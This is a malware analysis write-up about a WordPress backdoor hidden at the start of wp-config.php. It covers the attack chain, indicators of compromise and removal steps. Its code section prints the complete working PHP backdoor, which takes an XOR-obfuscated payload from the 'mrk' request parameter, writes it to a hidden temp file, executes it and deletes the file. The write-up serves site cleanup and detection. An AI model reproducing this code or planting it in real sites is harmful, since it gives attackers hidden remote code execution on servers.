Technical Analysis
The malware is embedded at the start of 'wp-config.php', using an XOR-obfuscation technique to dynamically execute arbitrary PHP code upon receiving specific HTTP requests. It leverages PHP’s ability to write to sys directories, thus avoiding direct disk alterations apart from transient file creation. This malicious code is triggered by the 'mrk' parameter, decodes payloads using XOR and executes them by writing to temporary files.
VirusTotal Analysis: 🛡️ Zero-Day / Fully Undetected.
Attack Chain
- Step 1: Detects specific GET/POST request parameter 'mrk'.
- Step 2: Decodes the payload using XOR obfuscation.
- Step 3: Writes a temporary file '.desc' in writable directories, executes the payload, then deletes the file.
Code Signature(s)
FILE: wp-config.php
<?php
if(array_key_exists("mr\x6B", $_REQUEST) && !is_null($_REQUEST["mr\x6B"])){ $val = hex2bin($_REQUEST["mr\x6B"]); $entity = ''; $k = 0; while($k < strlen($val)){$entity .= chr(ord($val[$k]) ^ 66);$k++;} $data = array_filter([getenv("TEMP"), getcwd(), "/var/tmp", session_save_path(), "/dev/shm", getenv("TMP"), ini_get("upload_tmp_dir"), "/tmp", sys_get_temp_dir()]); $ref = 0; do { $hld = $data[$ref] ?? null; if ($ref >= count($data)) break; if ((is_dir($hld) and is_writable($hld))) { $ent = str_replace("{var_dir}", $hld, "{var_dir}/.desc"); if (file_put_contents($ent, $entity)) { include $ent; @unlink($ent); exit; } } $ref++; } while (true); }
define( 'WP_CACHE', true );
/**
* The base configuration for WordPress
Indicators of Compromise (IOCs)
mr\x6B.descxor 66
Removal Protocol
- Step 1: Backup the affected 'wp-config.php'.
- Step 2: Open 'wp-config.php' and remove the malicious PHP code snippet at the top.
- Step 3: Secure file permissions by setting 'wp-config.php' permissions to 640.
- Step 4: Confirm no other files are modified or infected by scanning the site.
- Step 5: Update all server and WordPress components to the latest versions.
Status: Active Threat.
Verification: Verified by MD Pabel.
Top comments (0)